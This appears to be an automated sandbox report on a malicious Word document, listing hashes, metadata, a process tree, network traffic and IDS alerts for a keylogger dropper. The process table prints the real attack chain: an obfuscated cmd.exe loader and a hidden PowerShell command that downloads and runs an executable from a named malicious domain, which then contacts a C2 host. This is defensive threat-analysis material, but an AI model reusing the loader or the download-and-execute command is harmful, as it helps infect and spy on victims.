File name: | 5f67fe74056e5042951d1e9f7288a4c2a6a5c5ecc02f06b83a1c1131f3e7579c.doc |
Full analysis: | https://app.any.run/tasks/96fc721e-1483-45a3-8d2e-d24d0697c165 |
Verdict: | Malicious activity |
Threats: | A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools. |
Analysis date: | June 19, 2019, 03:05:15 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Jennifer Haze, Template: Normal.dotm, Last Saved By: Jennifer Haze, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Apr 25 02:44:00 2019, Last Saved Time/Date: Thu Apr 25 02:44:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0 |
MD5: | 60BF475F279596141257F4351DFE3A1A |
SHA1: | 254F60DB098465FF712F3A39E5872A57D8D63F43 |
SHA256: | 5F67FE74056E5042951D1E9F7288A4C2A6A5C5ECC02F06B83A1C1131F3E7579C |
SSDEEP: | 192:+VyZEvA+6/6rT5bk8xgNAOR61OTP60j9AOt0y8aVpXAAFl6gWbCjk:iiSY5U1g60j9dtfrpQ6WbCj |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 14 |
CharCountWithSpaces: | - |
Paragraphs: | - |
Lines: | - |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | - |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:04:25 01:44:00 |
CreateDate: | 2019:04:25 01:44:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 2 |
LastModifiedBy: | Jennifer Haze |
Template: | Normal.dotm |
Keywords: | - |
Author: | Jennifer Haze |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2964 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\5f67fe74056e5042951d1e9f7288a4c2a6a5c5ecc02f06b83a1c1131f3e7579c.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
1644 | cmd.exe /v:ON /c"set done= && set x=mSC3w\Hi:nM6J-b,Nd/ED1 p(9jlsyo'aWF;uctrPhex.q%B)OT && for %H in (23,30,4,42,39,28,41,42,27,27,22,13,4,22,6,7,17,17,42,9,22,13,19,43,42,37,36,38,7,30,9,40,30,27,7,37,29,22,47,29,23,32,28,28,22,24,9,42,4,13,30,14,26,42,37,38,22,1,29,28,38,42,0,44,16,42,38,44,33,42,14,2,27,7,42,9,38,48,44,20,30,4,9,27,30,32,17,34,7,27,42,24,31,41,38,38,23,8,18,18,32,36,38,30,39,42,23,32,7,39,7,9,28,23,7,39,42,44,37,30,0,18,28,42,37,36,39,42,18,42,43,42,44,42,43,42,31,15,31,46,50,19,10,40,46,5,42,43,42,44,42,43,42,31,48,35,22,46,50,19,10,40,46,5,42,43,42,44,42,43,42,4734) DO (set done=!done!!x:~%H,1!) && if %H == 4734 call !done:~-171!" | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2560 | powershell -w Hidden -ExecutionPolicy Bypass (new-object System.Net.WebClient).DownloadFile('http://autorepairinspire.com/secure/exe.exe','C:\Users\admin\AppData\Local\Temp\exe.exe'); C:\Users\admin\AppData\Local\Temp\exe.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
180 | "C:\Users\admin\AppData\Local\Temp\exe.exe" | C:\Users\admin\AppData\Local\Temp\exe.exe | powershell.exe | |
User: admin Company: Jordan Russell Integrity Level: MEDIUM Description: Inno Setup Uninstaller Exit code: 0 Version: 51.9.0.0 | ||||
2728 | "C:\Users\admin\AppData\Local\Temp\exe.exe" | C:\Users\admin\AppData\Local\Temp\exe.exe | exe.exe | |
User: admin Company: Jordan Russell Integrity Level: MEDIUM Description: Inno Setup Uninstaller Version: 51.9.0.0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2964 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRDE3.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2964 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF8FE8B5FFCFCE9222.TMP | — | |
MD5:— | SHA256:— | |||
2964 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{198E30E5-DD9E-40F0-9E07-FE439EFC821A}.tmp | — | |
MD5:— | SHA256:— | |||
2964 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4E7A5476-B07A-4CCD-8E10-721F566CADD7}.tmp | — | |
MD5:— | SHA256:— | |||
2560 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E67LF6HNBT6NDIW29T0L.temp | — | |
MD5:— | SHA256:— | |||
2560 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
180 | exe.exe | C:\Users\admin\AppData\Local\Temp\91627215 | binary | |
MD5:124D19D1AB4B87D70B26E63CD0DD2F00 | SHA256:409D418A8DC62F29B35BF7F4CA425EDC3A184C54CA1CCCCF7A5959066FEBE1BC | |||
2560 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF123224.TMP | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
2964 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$67fe74056e5042951d1e9f7288a4c2a6a5c5ecc02f06b83a1c1131f3e7579c.doc | pgc | |
MD5:80F82C6686CA52EBB6102E269E384024 | SHA256:0A69A954108FFF20D4637AC819C65764A20DAA6FA82EE74DA363CE3C3514B484 | |||
2964 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:1C3731FA96EBDD2B59DD9077E7304E50 | SHA256:90231EF6597C66760A15F548BBB57E7F36AE0729947BF09439BF18DB568920C7 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2560 | powershell.exe | GET | 200 | 82.221.129.17:80 | http://autorepairinspire.com/secure/exe.exe | IS | executable | 465 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2728 | exe.exe | 213.152.162.84:16098 | sub2.xboxjordan.waw.pl | Global Layer B.V. | NL | malicious |
2560 | powershell.exe | 82.221.129.17:80 | autorepairinspire.com | Thor Data Center ehf | IS | malicious |
Domain | IP | Reputation |
---|---|---|
autorepairinspire.com |
| malicious |
sub2.xboxjordan.waw.pl |
| malicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
2560 | powershell.exe | A Network Trojan was detected | ET TROJAN Suspicious exe.exe request - possible downloader/Oficla |
2560 | powershell.exe | Potentially Bad Traffic | ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile |
2560 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2560 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |